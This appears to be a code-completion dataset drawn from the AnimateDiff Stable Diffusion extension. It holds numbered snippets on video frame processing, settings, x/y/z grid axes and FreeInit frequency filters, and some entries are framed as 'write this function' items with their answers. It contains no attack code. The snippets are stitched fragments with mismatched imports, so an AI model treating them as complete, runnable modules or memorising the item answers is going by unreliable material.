                mask_image = Image.open(mask_image_path)
                p.image_mask = mask_image
    # optionally restore generation params from the first frame's PNG info
    if use_png_info:
        try:
            info_img = frame_images[0]
            if png_info_dir:
                info_img_path = os.path.join(png_info_dir, os.path.basename(image))
                info_img = Image.open(info_img_path)
            from modules import images as imgutil
            from modules.infotext_utils import parse_generation_parameters
            geninfo, _ = imgutil.read_info_from_image(info_img)
            parsed_parameters = parse_generation_parameters(geninfo)
            parsed_parameters = {k: v for k, v in parsed_parameters.items() if k in (png_info_props or {})}
        except Exception:
            parsed_parameters = {}
        p.prompt = prompt + (" " + parsed_parameters["Prompt"] if "Prompt" in parsed_parameters else "")
        p.negative_prompt = negative_prompt + (" " + parsed_parameters["Negative prompt"] if "Negative prompt" in parsed_parameters else "")
        p.seed = int(parsed_parameters.get("Seed", seed))
        p.cfg_scale = float(parsed_parameters.get("CFG scale", cfg_scale))
        p.sampler_name = parsed_parameters.get("Sampler", sampler_name)
        p.steps = int(parsed_parameters.get("Steps", steps))
        model_info = get_closet_checkpoint_match(parsed_parameters.get("Model hash", None))
        if model_info is not None:
            p.override_settings['sd_model_checkpoint'] = model_info.name
        elif sd_model_checkpoint_override:
            p.override_settings['sd_model_checkpoint'] = sd_model_checkpoint_override
        else:
            p.override_settings.pop("sd_model_checkpoint", None)
    if output_dir:
        p.outpath_samples = output_dir
        p.override_settings['save_to_dirs'] = False
        p.override_settings['save_images_replace_action'] = "Add number suffix"
        if p.n_iter > 1 or p.batch_size > 1:
            p.override_settings['samples_filename_pattern'] = f'{image_path.stem}-[generation_number]'
        else:
            p.override_settings['samples_filename_pattern'] = f'{image_path.stem}'
    # hand the whole frame stack to one processing call
    p.init_images = frame_images
    if len(frame_masks) > 0:
        p.image_mask = frame_masks
    proc = scripts.scripts_img2img.run(p, *args) # we should not support this, but just leave it here
    if proc is None:
        p.override_settings.pop('save_images_replace_action', None)
        proc = process_images(p)
    else:
        logger.warn("Warning: you are using an unsupported external script. AnimateDiff may not work properly.")
    if not discard_further_results and proc:
        if batch_results:
            batch_results.images.extend(proc.images)
            batch_results.infotexts.extend(proc.infotexts)
        else:
            batch_results = proc
        if 0 <= shared.opts.img2img_batch_show_results_limit < len(batch_results.images):
            discard_further_results = True
            batch_results.images = batch_results.images[:int(shared.opts.img2img_batch_show_results_limit)]
            batch_results.infotexts = batch_results.infotexts[:int(shared.opts.img2img_batch_show_results_limit)]
    return batch_results
3,818 | import os
from modules.paths import data_path
from modules.processing import StableDiffusionProcessing, StableDiffusionProcessingImg2Img
from scripts.animatediff_ui import AnimateDiffProcess
from scripts.animatediff_logger import logger_animatediff as logger
class AnimateDiffProcess:
    """
    Container for every AnimateDiff UI setting plus a few non-UI runtime
    states. Knows how to serialize itself for infotext and how to prepare
    a ``StableDiffusionProcessing`` object for video generation.
    """
    def __init__(
        self,
        model="mm_sd15_v3.safetensors",
        enable=False,
        video_length=0,
        fps=8,
        loop_number=0,
        closed_loop='R-P',
        batch_size=16,
        stride=1,
        overlap=-1,
        # NOTE(review): this default is evaluated once at import time and is
        # a shared mutable list — confirm callers never mutate it in place.
        format=shared.opts.data.get("animatediff_default_save_formats", ["GIF", "PNG"]),
        interp='Off',
        interp_x=10,
        video_source=None,
        video_path='',
        mask_path='',
        freeinit_enable=False,
        freeinit_filter="butterworth",
        freeinit_ds=0.25,
        freeinit_dt=0.25,
        freeinit_iters=3,
        latent_power=1,
        latent_scale=32,
        last_frame=None,
        latent_power_last=1,
        latent_scale_last=32,
        request_id = '',
    ):
        self.model = model
        self.enable = enable
        self.video_length = video_length
        self.fps = fps
        self.loop_number = loop_number
        self.closed_loop = closed_loop
        self.batch_size = batch_size
        self.stride = stride
        self.overlap = overlap
        self.format = format
        self.interp = interp
        self.interp_x = interp_x
        self.video_source = video_source
        self.video_path = video_path
        self.mask_path = mask_path
        self.freeinit_enable = freeinit_enable
        self.freeinit_filter = freeinit_filter
        self.freeinit_ds = freeinit_ds
        self.freeinit_dt = freeinit_dt
        self.freeinit_iters = freeinit_iters
        self.latent_power = latent_power
        self.latent_scale = latent_scale
        self.last_frame = last_frame
        self.latent_power_last = latent_power_last
        self.latent_scale_last = latent_scale_last
        # non-ui states
        self.request_id = request_id
        self.video_default = False
        self.is_i2i_batch = False
        self.prompt_scheduler = None
    def get_list(self, is_img2img: bool):
        """Return UI values in component order (first 25 for i2i, 20 for t2i).

        NOTE(review): relies on the attribute insertion order above matching
        the Gradio component order exactly — keep them in sync.
        """
        return list(vars(self).values())[:(25 if is_img2img else 20)]
    def get_dict(self, is_img2img: bool):
        """Build the comma-separated infotext string (despite the name,
        returns a str, not a dict)."""
        infotext = {
            "model": self.model,
            "video_length": self.video_length,
            "fps": self.fps,
            "loop_number": self.loop_number,
            "closed_loop": self.closed_loop,
            "batch_size": self.batch_size,
            "stride": self.stride,
            "overlap": self.overlap,
            "interp": self.interp,
            "interp_x": self.interp_x,
            "freeinit_enable": self.freeinit_enable,
        }
        if self.request_id:
            infotext['request_id'] = self.request_id
        # motion_module / subprocess / git are module-level names in the
        # real source file (not visible in this chunk)
        if motion_module.mm is not None and motion_module.mm.mm_hash is not None:
            infotext['mm_hash'] = motion_module.mm.mm_hash[:8]
        if is_img2img:
            infotext.update({
                "latent_power": self.latent_power,
                "latent_scale": self.latent_scale,
                "latent_power_last": self.latent_power_last,
                "latent_scale_last": self.latent_scale_last,
            })
        try:
            # record the extension version via its git tag; best effort only
            ad_git_tag = subprocess.check_output(
                [git, "-C", motion_module.get_model_dir(), "describe", "--tags"],
                shell=False, encoding='utf8').strip()
            infotext['version'] = ad_git_tag
        except Exception as e:
            logger.warning(f"Failed to get git tag for AnimateDiff: {e}")
        infotext_str = ', '.join(f"{k}: {v}" for k, v in infotext.items())
        return infotext_str
    def get_param_names(self, is_img2img: bool):
        """Names of the fields preserved when pasting infotext back."""
        preserve = ["model", "enable", "video_length", "fps", "loop_number", "closed_loop", "batch_size", "stride", "overlap", "format", "interp", "interp_x"]
        if is_img2img:
            preserve.extend(["latent_power", "latent_power_last", "latent_scale", "latent_scale_last"])
        return preserve
    def _check(self):
        """Validate user input; raises AssertionError on bad settings."""
        assert (
            self.video_length >= 0 and self.fps > 0
        ), "Video length and FPS should be positive."
        assert not set(supported_save_formats[:-1]).isdisjoint(
            self.format
        ), "At least one saving format should be selected."
    def apply_xyz(self):
        """Overwrite fields with values chosen by the xyz-grid script."""
        for k, v in xyz_attrs.items():
            setattr(self, k, v)
    def set_p(self, p: StableDiffusionProcessing):
        """Configure `p` for video generation and wire up ControlNet batches."""
        self._check()
        # webui batch size becomes the number of frames per pass
        if self.video_length < self.batch_size:
            p.batch_size = self.batch_size
        else:
            p.batch_size = self.video_length
        if self.video_length == 0:
            self.video_length = p.batch_size
            self.video_default = True
        if self.overlap == -1:
            self.overlap = self.batch_size // 4
        if "PNG" not in self.format or shared.opts.data.get("animatediff_save_to_custom", True):
            p.do_not_save_samples = True
        cn_units = get_controlnet_units(p)
        min_batch_in_cn = -1
        for cn_unit in cn_units:
            # batch path broadcast
            if (cn_unit.input_mode.name == 'SIMPLE' and cn_unit.image is None) or \
                    (cn_unit.input_mode.name == 'BATCH' and not cn_unit.batch_images) or \
                    (cn_unit.input_mode.name == 'MERGE' and not cn_unit.batch_input_gallery):
                if not self.video_path:
                    extract_frames_from_video(self)
                cn_unit.input_mode = cn_unit.input_mode.__class__.BATCH
                cn_unit.batch_images = self.video_path
            # mask path broadcast
            if cn_unit.input_mode.name == 'BATCH' and self.mask_path and not cn_unit.batch_mask_dir:
                cn_unit.batch_mask_dir = self.mask_path
            # find minimum control images in CN batch
            cn_unit_batch_params = cn_unit.batch_images.split('\n')
            if cn_unit.input_mode.name == 'BATCH':
                cn_unit.animatediff_batch = True # for A1111 sd-webui-controlnet
                if not any([cn_param.startswith("keyframe:") for cn_param in cn_unit_batch_params[1:]]):
                    cn_unit_batch_num = len(shared.listfiles(cn_unit_batch_params[0]))
                    if min_batch_in_cn == -1 or cn_unit_batch_num < min_batch_in_cn:
                        min_batch_in_cn = cn_unit_batch_num
        if min_batch_in_cn != -1:
            # clamp video length to the smallest ControlNet frame stack
            self.fix_video_length(p, min_batch_in_cn)
            def cn_batch_modifler(batch_image_files: List[str], p: StableDiffusionProcessing):
                # truncate each CN unit's frame list to the video length
                return batch_image_files[:self.video_length]
            for cn_unit in cn_units:
                if cn_unit.input_mode.name == 'BATCH':
                    cur_batch_modifier = getattr(cn_unit, "batch_modifiers", [])
                    cur_batch_modifier.append(cn_batch_modifler)
                    cn_unit.batch_modifiers = cur_batch_modifier
        self.post_setup_cn_for_i2i_batch(p)
        logger.info(f"AnimateDiff + ControlNet will generate {self.video_length} frames.")
    def fix_video_length(self, p: StableDiffusionProcessing, min_batch_in_cn: int):
        """Clamp video_length / batch_size to `min_batch_in_cn` frames."""
        # ensure that params.video_length <= video_length and params.batch_size <= video_length
        if self.video_length > min_batch_in_cn:
            self.video_length = min_batch_in_cn
            p.batch_size = min_batch_in_cn
        if self.batch_size > min_batch_in_cn:
            self.batch_size = min_batch_in_cn
        if self.video_default:
            self.video_length = min_batch_in_cn
            p.batch_size = min_batch_in_cn
    def post_setup_cn_for_i2i_batch(self, p: StableDiffusionProcessing):
        """For i2i batch mode, reconcile frame count with init images/masks."""
        if not (self.is_i2i_batch and isinstance(p, StableDiffusionProcessingImg2Img)):
            return
        if len(p.init_images) > self.video_length:
            p.init_images = p.init_images[:self.video_length]
            if p.image_mask and isinstance(p.image_mask, list) and len(p.image_mask) > self.video_length:
                p.image_mask = p.image_mask[:self.video_length]
        if len(p.init_images) < self.video_length:
            self.video_length = len(p.init_images)
            p.batch_size = len(p.init_images)
        if len(p.init_images) < self.batch_size:
            self.batch_size = len(p.init_images)
def update_infotext(p: StableDiffusionProcessing, params: AnimateDiffProcess):
    """Attach the serialized AnimateDiff settings to `p`'s infotext params."""
    if p.extra_generation_params is None:
        return
    is_i2i = isinstance(p, StableDiffusionProcessingImg2Img)
    p.extra_generation_params["AnimateDiff"] = params.get_dict(is_i2i)
3,819 | import os
from modules.paths import data_path
from modules.processing import StableDiffusionProcessing, StableDiffusionProcessingImg2Img
from scripts.animatediff_ui import AnimateDiffProcess
from scripts.animatediff_logger import logger_animatediff as logger
def write_params_txt(info: str):
    """Persist generation parameters to params.txt under the webui data path."""
    target = os.path.join(data_path, "params.txt")
    with open(target, "w", encoding="utf8") as fh:
        fh.write(info)
3,820 | import os
from modules.paths import data_path
from modules.processing import StableDiffusionProcessing, StableDiffusionProcessingImg2Img
from scripts.animatediff_ui import AnimateDiffProcess
from scripts.animatediff_logger import logger_animatediff as logger
def infotext_pasted(infotext, results):
    """Expand a packed "AnimateDiff" infotext entry into individual fields.

    The webui passes pasted infotext as a flat {label: value} dict; AnimateDiff
    stores its parameters as one comma-separated string under the "AnimateDiff"
    key. This splits that string into separate "AnimateDiff <field>" entries so
    each value maps back onto its own UI component.

    Mutates `results` in place. `infotext` is unused (webui callback signature).
    """
    # Iterate over a snapshot: the loop body both inserts new keys and pops
    # "AnimateDiff", and mutating a dict while iterating it raises
    # "RuntimeError: dictionary changed size during iteration" in Python 3.
    for k, v in list(results.items()):
        if not k.startswith("AnimateDiff"):
            continue
        assert isinstance(v, str), f"Expected string but got {v}."
        try:
            for items in v.split(', '):
                field, value = items.split(': ')
                results[f"AnimateDiff {field}"] = value
            results.pop("AnimateDiff")
        except Exception as e:
            # best effort: leave partially-parsed entries and stop
            logger.warn(f"Failed to parse infotext value:\n{v}")
            logger.warn(f"Exception: {e}")
            break
3,821 | import sys
from types import ModuleType
from typing import Optional
from modules import scripts
from scripts.animatediff_logger import logger_animatediff as logger
def apply_state(k, key_map=None):
    """Build an xyz-grid `apply` callback that stores the axis value under `k`.

    `key_map`, when given, translates the displayed choice into the value
    actually stored in the shared `xyz_attrs` dict.
    """
    def _apply(_p, value, _vs):
        if key_map is not None:
            value = key_map[value]
        xyz_attrs[k] = value
    return _apply
def str_to_bool(string):
    """Parse an xyz-grid cell into True / False / None.

    "None" and "" map to None; "true"/"1" and "false"/"0" (case-insensitive)
    map to booleans; anything else raises ValueError.
    """
    text = str(string)
    if text in ("None", ""):
        return None
    lowered = text.lower()
    if lowered in ("true", "1"):
        return True
    if lowered in ("false", "0"):
        return False
    raise ValueError(f"Could not convert string to boolean: {text}")
def int_or_float(string):
    """Interpret a grid cell as a number: int when exact, otherwise float."""
    try:
        value = int(string)
    except ValueError:
        value = float(string)
    return value
def choices_bool():
    """Choice list offered for boolean xyz axes."""
    return [str(flag) for flag in (False, True)]
def find_xyz_module() -> Optional[ModuleType]:
    """Locate the built-in xyz_grid (or legacy xy_grid) script module, if any."""
    grid_modules = {"xyz_grid.py", "xy_grid.py"}
    for script in scripts.scripts_data:
        if script.script_class.__module__ in grid_modules and hasattr(script, "module"):
            return script.module
    return None
def patch_xyz():
    """Register AnimateDiff axes on the webui's built-in x/y/z grid script.

    Each axis stores its parsed cell value via `apply_state`, which writes
    into the shared `xyz_attrs` dict; AnimateDiff reads those overrides per
    grid cell. No-op (with a warning) when the xyz module cannot be found.
    """
    xyz_module = find_xyz_module()
    if xyz_module is None:
        logger.warning("XYZ module not found.")
        return
    # label prefix shown in the xyz axis dropdowns
    MODULE = "[AnimateDiff]"
    xyz_module.axis_options.extend([
        xyz_module.AxisOption(
            label=f"{MODULE} Enabled",
            type=str_to_bool,
            apply=apply_state("enable"),
            choices=choices_bool),
        xyz_module.AxisOption(
            label=f"{MODULE} Motion Module",
            type=str,
            apply=apply_state("model")),
        xyz_module.AxisOption(
            label=f"{MODULE} Video length",
            type=int_or_float,
            apply=apply_state("video_length")),
        xyz_module.AxisOption(
            label=f"{MODULE} FPS",
            type=int_or_float,
            apply=apply_state("fps")),
        xyz_module.AxisOption(
            label=f"{MODULE} Use main seed",
            type=str_to_bool,
            apply=apply_state("use_main_seed"),
            choices=choices_bool),
        xyz_module.AxisOption(
            label=f"{MODULE} Closed loop",
            type=str,
            apply=apply_state("closed_loop"),
            choices=lambda: ["N", "R-P", "R+P", "A"]),
        xyz_module.AxisOption(
            label=f"{MODULE} Batch size",
            type=int_or_float,
            apply=apply_state("batch_size")),
        xyz_module.AxisOption(
            label=f"{MODULE} Stride",
            type=int_or_float,
            apply=apply_state("stride")),
        xyz_module.AxisOption(
            label=f"{MODULE} Overlap",
            type=int_or_float,
            apply=apply_state("overlap")),
        xyz_module.AxisOption(
            label=f"{MODULE} Interp",
            type=str_to_bool,
            apply=apply_state("interp"),
            choices=choices_bool),
        xyz_module.AxisOption(
            label=f"{MODULE} Interp X",
            type=int_or_float,
            apply=apply_state("interp_x")),
        xyz_module.AxisOption(
            label=f"{MODULE} Video path",
            type=str,
            apply=apply_state("video_path")),
        # the latent power/scale axes only make sense for img2img
        xyz_module.AxisOptionImg2Img(
            label=f"{MODULE} Latent power",
            type=int_or_float,
            apply=apply_state("latent_power")),
        xyz_module.AxisOptionImg2Img(
            label=f"{MODULE} Latent scale",
            type=int_or_float,
            apply=apply_state("latent_scale")),
        xyz_module.AxisOptionImg2Img(
            label=f"{MODULE} Latent power last",
            type=int_or_float,
            apply=apply_state("latent_power_last")),
        xyz_module.AxisOptionImg2Img(
            label=f"{MODULE} Latent scale last",
            type=int_or_float,
            apply=apply_state("latent_scale_last")),
    ])
3,822 | import os
import cv2
import subprocess
from pathlib import Path
from modules import shared
from modules.paths import data_path
from modules.processing import StableDiffusionProcessing
from scripts.animatediff_logger import logger_animatediff as logger
def generate_random_hash(length=8):
    """Return the first `length` hex chars of a SHA-256 digest of random bytes.

    `length` is effectively capped at 64, the size of a hex-encoded SHA-256
    digest.
    """
    import hashlib
    import secrets

    digest = hashlib.sha256(secrets.token_bytes(32)).hexdigest()
    return digest[:min(length, len(digest))]
def ffmpeg_extract_frames(source_video: str, output_dir: str, extract_key: bool = False):
    """Extract frames from `source_video` into `output_dir` via ffmpeg.

    With `extract_key`, only keyframes (I-frames) are kept; otherwise
    near-duplicate frames are dropped with mpdecimate. Raises
    subprocess.CalledProcessError when ffmpeg exits non-zero.
    """
    from modules.devices import device

    cmd = ["ffmpeg"]
    if "cuda" in str(device):
        # let ffmpeg decode on the GPU when one is available
        cmd += ["-hwaccel", "cuda"]
    cmd += ["-i", source_video]
    if extract_key:
        cmd += ["-vf", "select='eq(pict_type,I)'", "-vsync", "vfr"]
    else:
        cmd += ["-filter:v", "mpdecimate=hi=64*200:lo=64*50:frac=0.33,setpts=N/FRAME_RATE/TB"]
    frame_dir = Path(output_dir)
    frame_dir.mkdir(parents=True, exist_ok=True)
    cmd += ["-qscale:v", "1", "-qmin", "1", "-c:a", "copy", str(frame_dir / '%09d.jpg')]
    logger.info(f"Attempting to extract frames via ffmpeg from {source_video} to {output_dir}")
    subprocess.run(cmd, check=True)
def cv2_extract_frames(source_video: str, output_dir: str):
    """Fallback frame extraction with OpenCV: dump every frame as a PNG."""
    logger.info(f"Attempting to extract frames via OpenCV from {source_video} to {output_dir}")
    frame_dir = Path(output_dir)
    frame_dir.mkdir(parents=True, exist_ok=True)
    capture = cv2.VideoCapture(source_video)
    index = 0
    while capture.isOpened():
        ok, frame = capture.read()
        if not ok:
            break
        cv2.imwrite(f"{frame_dir}/{index}.png", frame)
        index += 1
    capture.release()
def extract_frames_from_video(params):
    """Extract condition frames from params.video_source into a unique dir.

    The target directory (base path from settings, plus a per-run suffix of
    video stem + random hash) is stored in params.video_path. Tries ffmpeg
    first and falls back to OpenCV on any failure.
    """
    assert params.video_source, "You need to specify cond hint for ControlNet."
    default_root = f"{data_path}/tmp/animatediff-frames"
    params.video_path = shared.opts.data.get("animatediff_frame_extract_path", default_root)
    if not params.video_path:
        # the option may be stored as None / empty string
        params.video_path = default_root
    stem = Path(params.video_source).stem
    params.video_path = os.path.join(params.video_path, f"{stem}-{generate_random_hash()}")
    try:
        ffmpeg_extract_frames(params.video_source, params.video_path)
    except Exception as e:
        logger.error(f"[AnimateDiff] Error extracting frames via ffmpeg: {e}, fall back to OpenCV.")
        cv2_extract_frames(params.video_source, params.video_path)
3,823 | import torch
import torch.fft as fft
import math
import os
import re
import sys
from modules import sd_models, shared, sd_samplers, devices
from modules.paths import extensions_builtin_dir
from modules.processing import StableDiffusionProcessing, opt_C, opt_f, StableDiffusionProcessingTxt2Img, StableDiffusionProcessingImg2Img, decode_latent_batch
from types import MethodType
from scripts.animatediff_logger import logger_animatediff as logger
from scripts.animatediff_ui import AnimateDiffProcess
def ddim_add_noise(
    original_samples: torch.FloatTensor,
    noise: torch.FloatTensor,
    timesteps: torch.IntTensor,
) -> torch.FloatTensor:
    """Forward-diffuse `original_samples` to the given `timesteps`.

    Standard DDPM/DDIM noising: sqrt(a_t) * x0 + sqrt(1 - a_t) * eps, using
    the alphas_cumprod schedule of the currently loaded SD model.
    """
    # match schedule device/dtype to the samples before indexing
    alphas_cumprod = shared.sd_model.alphas_cumprod.to(
        device=original_samples.device, dtype=original_samples.dtype
    )
    timesteps = timesteps.to(original_samples.device)

    def _broadcast(t: torch.Tensor) -> torch.Tensor:
        # reshape (N,) -> (N, 1, 1, ...) so it broadcasts over the sample rank
        t = t.flatten()
        while t.dim() < original_samples.dim():
            t = t.unsqueeze(-1)
        return t

    sqrt_alpha = _broadcast(alphas_cumprod[timesteps] ** 0.5)
    sqrt_one_minus_alpha = _broadcast((1 - alphas_cumprod[timesteps]) ** 0.5)
    return sqrt_alpha * original_samples + sqrt_one_minus_alpha * noise
3,824 | import torch
import torch.fft as fft
import math
import os
import re
import sys
from modules import sd_models, shared, sd_samplers, devices
from modules.paths import extensions_builtin_dir
from modules.processing import StableDiffusionProcessing, opt_C, opt_f, StableDiffusionProcessingTxt2Img, StableDiffusionProcessingImg2Img, decode_latent_batch
from types import MethodType
from scripts.animatediff_logger import logger_animatediff as logger
from scripts.animatediff_ui import AnimateDiffProcess
The provided code snippet includes the necessary dependencies for implementing the `freq_mix_3d` function. Write a Python function `def freq_mix_3d(x, noise, LPF)` to solve the following problem:
Noise reinitialization. Args: `x` — the diffused latent; `noise` — randomly sampled noise; `LPF` — a low-pass filter mask.
Here is the function:
def freq_mix_3d(x, noise, LPF):
    """Noise reinitialization (FreeInit-style frequency mixing).

    Keeps the low-frequency band of `x` and replaces its high frequencies
    with those of `noise`.

    Args:
        x: diffused latent
        noise: randomly sampled noise
        LPF: low pass filter mask (1 = keep x, 0 = take noise)
    """
    dims = (-3, -2, -1)
    # move both signals to the (shifted) frequency domain
    x_freq = fft.fftshift(fft.fftn(x, dim=dims), dim=dims)
    noise_freq = fft.fftshift(fft.fftn(noise, dim=dims), dim=dims)
    # blend: low band from x, complementary high band from noise
    mixed_freq = x_freq * LPF + noise_freq * (1 - LPF)
    # back to the spatial domain; inputs are real so drop the imaginary part
    mixed_freq = fft.ifftshift(mixed_freq, dim=dims)
    return fft.ifftn(mixed_freq, dim=dims).real
3,825 | import torch
import torch.fft as fft
import math
import os
import re
import sys
from modules import sd_models, shared, sd_samplers, devices
from modules.paths import extensions_builtin_dir
from modules.processing import StableDiffusionProcessing, opt_C, opt_f, StableDiffusionProcessingTxt2Img, StableDiffusionProcessingImg2Img, decode_latent_batch
from types import MethodType
from scripts.animatediff_logger import logger_animatediff as logger
from scripts.animatediff_ui import AnimateDiffProcess
def gaussian_low_pass_filter(shape, d_s=0.25, d_t=0.25):
    """
    Compute the gaussian low pass filter mask.
    Args:
        shape: shape of the filter (volume)
        d_s: normalized stop frequency for spatial dimensions (0.0-1.0)
        d_t: normalized stop frequency for temporal dimension (0.0-1.0)
    """
    T, H, W = shape[-3:]
    mask = torch.zeros(shape)
    if d_s == 0 or d_t == 0:
        # degenerate cutoff: pass nothing
        return mask
    for t in range(T):
        zt = (d_s / d_t) * (2 * t / T - 1)
        for h in range(H):
            zh = 2 * h / H - 1
            for w in range(W):
                zw = 2 * w / W - 1
                dist_sq = zt ** 2 + zh ** 2 + zw ** 2
                mask[..., t, h, w] = math.exp(-1 / (2 * d_s ** 2) * dist_sq)
    return mask
def butterworth_low_pass_filter(shape, n=4, d_s=0.25, d_t=0.25):
    """
    Compute the butterworth low pass filter mask.
    Args:
        shape: shape of the filter (volume)
        n: order of the filter, larger n ~ ideal, smaller n ~ gaussian
        d_s: normalized stop frequency for spatial dimensions (0.0-1.0)
        d_t: normalized stop frequency for temporal dimension (0.0-1.0)
    """
    T, H, W = shape[-3:]
    mask = torch.zeros(shape)
    if d_s == 0 or d_t == 0:
        # degenerate cutoff: pass nothing
        return mask
    for t in range(T):
        zt = (d_s / d_t) * (2 * t / T - 1)
        for h in range(H):
            zh = 2 * h / H - 1
            for w in range(W):
                zw = 2 * w / W - 1
                dist_sq = zt ** 2 + zh ** 2 + zw ** 2
                mask[..., t, h, w] = 1 / (1 + (dist_sq / d_s ** 2) ** n)
    return mask
def ideal_low_pass_filter(shape, d_s=0.25, d_t=0.25):
    """
    Compute the ideal low pass filter mask.
    Args:
        shape: shape of the filter (volume)
        d_s: normalized stop frequency for spatial dimensions (0.0-1.0)
        d_t: normalized stop frequency for temporal dimension (0.0-1.0)
    """
    T, H, W = shape[-3:]
    mask = torch.zeros(shape)
    if d_s == 0 or d_t == 0:
        # degenerate cutoff: pass nothing
        return mask
    for t in range(T):
        zt = (d_s / d_t) * (2 * t / T - 1)
        for h in range(H):
            zh = 2 * h / H - 1
            for w in range(W):
                zw = 2 * w / W - 1
                dist_sq = zt ** 2 + zh ** 2 + zw ** 2
                # NOTE(review): threshold is d_s*2, not d_s**2 — matches the
                # upstream FreeInit implementation; confirm before "fixing".
                mask[..., t, h, w] = 1 if dist_sq <= d_s * 2 else 0
    return mask
def box_low_pass_filter(shape, d_s=0.25, d_t=0.25):
    """
    Compute the ideal low pass filter mask (approximated version).
    Args:
        shape: shape of the filter (volume)
        d_s: normalized stop frequency for spatial dimensions (0.0-1.0)
        d_t: normalized stop frequency for temporal dimension (0.0-1.0)
    """
    T, H, W = shape[-3:]
    mask = torch.zeros(shape)
    if d_s == 0 or d_t == 0:
        # degenerate cutoff: pass nothing
        return mask
    half_s = round((H // 2) * d_s)
    half_t = round((T // 2) * d_t)
    cframe, crow, ccol = T // 2, H // 2, W // 2
    # carve out a centered box of ones in the shifted frequency volume
    mask[..., cframe - half_t:cframe + half_t,
         crow - half_s:crow + half_s,
         ccol - half_s:ccol + half_s] = 1.0
    return mask
The provided code snippet includes the necessary dependencies for implementing the `get_freq_filter` function. Write a Python function `def get_freq_filter(shape, device, params: dict)` to solve the following problem:
Form the frequency filter for noise reinitialization. Args: `shape` — shape of the latent (B, C, T, H, W); `params` — filter parameters.
Here is the function:
def get_freq_filter(shape, device, params: dict):
    """
    Form the frequency filter for noise reinitialization.
    Args:
        shape: shape of latent (B, C, T, H, W)
        device: target device for the returned mask
        params: filter parameters (keys: 'method', 'd_s', 'd_t')
    """
    method = params['method']
    d_s, d_t = params['d_s'], params['d_t']
    if method == "gaussian":
        mask = gaussian_low_pass_filter(shape=shape, d_s=d_s, d_t=d_t)
    elif method == "ideal":
        mask = ideal_low_pass_filter(shape=shape, d_s=d_s, d_t=d_t)
    elif method == "box":
        mask = box_low_pass_filter(shape=shape, d_s=d_s, d_t=d_t)
    elif method == "butterworth":
        mask = butterworth_low_pass_filter(shape=shape, n=4, d_s=d_s, d_t=d_t)
    else:
        raise NotImplementedError
    return mask.to(device)
3,826 | import gradio as gr
from modules import shared
from scripts.animatediff_ui import supported_save_formats
# Output formats the AnimateDiff UI offers for saving generated animations.
supported_save_formats = ["GIF", "MP4", "WEBP", "WEBM", "PNG", "TXT"]
def on_ui_settings():
    """Register all AnimateDiff options on the webui Settings page.

    Two settings sections are created: the main "AnimateDiff" section and an
    "AnimateDiff AWS" section for S3-compatible object storage.
    """
    section = ("animatediff", "AnimateDiff")
    s3_selection = ("animatediff", "AnimateDiff AWS")
    shared.opts.add_option(
        "animatediff_model_path",
        shared.OptionInfo(
            None,
            "Path to save AnimateDiff motion modules",
            gr.Textbox,
            {"placeholder": "Leave empty to use default path: extensions/sd-webui-animatediff/model"},
            section=section,
        ),
    )
    shared.opts.add_option(
        "animatediff_default_save_formats",
        shared.OptionInfo(
            ["GIF", "PNG"],
            "Default Save Formats",
            gr.CheckboxGroup,
            {"choices": supported_save_formats},
            section=section
        ).needs_restart()
    )
    shared.opts.add_option(
        "animatediff_frame_extract_path",
        shared.OptionInfo(
            None,
            "Path to save extracted frames",
            gr.Textbox,
            {"placeholder": "Leave empty to use default path: tmp/animatediff-frames"},
            section=section
        )
    )
    shared.opts.add_option(
        "animatediff_frame_extract_remove",
        shared.OptionInfo(
            False,
            "Always remove extracted frames after processing",
            gr.Checkbox,
            section=section
        )
    )
    shared.opts.add_option(
        "animatediff_save_to_custom",
        shared.OptionInfo(
            True,
            "Save frames to stable-diffusion-webui/outputs/{ txt|img }2img-images/AnimateDiff/{gif filename}/{date} "
            "instead of stable-diffusion-webui/outputs/{ txt|img }2img-images/{date}/.",
            gr.Checkbox,
            section=section
        )
    )
    # traditional video optimization specification
    shared.opts.add_option(
        "animatediff_optimize_gif_palette",
        shared.OptionInfo(
            False,
            "Calculate the optimal GIF palette, improves quality significantly, removes banding",
            gr.Checkbox,
            section=section
        )
    )
    shared.opts.add_option(
        "animatediff_optimize_gif_gifsicle",
        shared.OptionInfo(
            False,
            "Optimize GIFs with gifsicle, reduces file size",
            gr.Checkbox,
            section=section
        )
    )
    shared.opts.add_option(
        key="animatediff_mp4_crf",
        info=shared.OptionInfo(
            default=23,
            label="MP4 Quality (CRF)",
            component=gr.Slider,
            component_args={
                "minimum": 0,
                "maximum": 51,
                "step": 1},
            section=section
        )
        .link("docs", "https://trac.ffmpeg.org/wiki/Encode/H.264#crf")
        .info("17 for best quality, up to 28 for smaller size")
    )
    shared.opts.add_option(
        key="animatediff_mp4_preset",
        info=shared.OptionInfo(
            default="",
            label="MP4 Encoding Preset",
            component=gr.Dropdown,
            component_args={"choices": ["", 'veryslow', 'slower', 'slow', 'medium', 'fast', 'faster', 'veryfast', 'superfast', 'ultrafast']},
            section=section,
        )
        .link("docs", "https://trac.ffmpeg.org/wiki/Encode/H.264#Preset")
        .info("encoding speed, use the slowest you can tolerate")
    )
    shared.opts.add_option(
        key="animatediff_mp4_tune",
        info=shared.OptionInfo(
            default="",
            label="MP4 Tune encoding for content type",
            component=gr.Dropdown,
            component_args={"choices": ["", "film", "animation", "grain"]},
            section=section
        )
        .link("docs", "https://trac.ffmpeg.org/wiki/Encode/H.264#Tune")
        .info("optimize for specific content types")
    )
    shared.opts.add_option(
        "animatediff_webp_quality",
        shared.OptionInfo(
            80,
            "WebP Quality (if lossless=True, increases compression and CPU usage)",
            gr.Slider,
            {
                "minimum": 1,
                "maximum": 100,
                "step": 1},
            section=section
        )
    )
    shared.opts.add_option(
        "animatediff_webp_lossless",
        shared.OptionInfo(
            False,
            "Save WebP in lossless format (highest quality, largest file size)",
            gr.Checkbox,
            section=section
        )
    )
    # s3 storage specification, most likely for some startup
    shared.opts.add_option(
        "animatediff_s3_enable",
        shared.OptionInfo(
            False,
            "Enable to Store file in object storage that supports the s3 protocol",
            gr.Checkbox,
            section=s3_selection
        )
    )
    shared.opts.add_option(
        "animatediff_s3_host",
        shared.OptionInfo(
            None,
            "S3 protocol host",
            gr.Textbox,
            section=s3_selection,
        ),
    )
    shared.opts.add_option(
        "animatediff_s3_port",
        shared.OptionInfo(
            None,
            "S3 protocol port",
            gr.Textbox,
            section=s3_selection,
        ),
    )
    shared.opts.add_option(
        "animatediff_s3_access_key",
        shared.OptionInfo(
            None,
            "S3 protocol access_key",
            gr.Textbox,
            section=s3_selection,
        ),
    )
    shared.opts.add_option(
        "animatediff_s3_secret_key",
        shared.OptionInfo(
            None,
            "S3 protocol secret_key",
